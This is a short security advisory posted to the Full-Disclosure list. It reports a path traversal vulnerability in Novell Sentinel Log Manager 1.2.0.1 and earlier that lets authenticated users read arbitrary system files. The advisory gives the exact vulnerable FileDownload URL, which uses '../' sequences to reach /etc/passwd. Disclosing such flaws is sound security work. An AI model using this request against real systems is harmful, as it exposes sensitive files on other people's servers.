Novell Sentinel Log Manager <=1.2.0.1 Path Traversal

Andrea Fabrizi <[email protected]>
Newsgroups gmane.comp.security.full-disclosure,gmane.comp.security.websecurity,gmane.comp.security.bugtraq,gmane.comp.security.web-applications
Message-ID <CAP-1Xubm7C1EsEQiPKe37DqHc41v3d8xs065sGreO99R=D3VNg@mail.gmail.com>
**************************************************************
Vuln: Path Traversal
Application: Sentinel Log Manager
Vendor: Novell
Version affected: <= 1.2.0.1
Website: http://www.novell.com/products/sentinel-log-manager/
Discovered By: Andrea Fabrizi
Email: [email protected]
Web: http://www.andreafabrizi.it
**************************************************************

The latest version of Sentinel Log Manager is prone to a Directory
Traversal, which makes it possible, for Authenticated Users, to access
any system file.

Testing environment: Sentinel Log Manager Appliance 1.2.0.1

Vulnerable URL:
/novelllogmanager/FileDownload?filename=/opt/novell/sentinel_log_mgr/3rdparty/tomcat/temp/../../../../../../etc/passwd

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
lmpx.com only provides a reader for public news (NNTP) servers. It is not affiliated with the servers or forums shown here and is not responsible for the content of articles, which is written by their respective authors.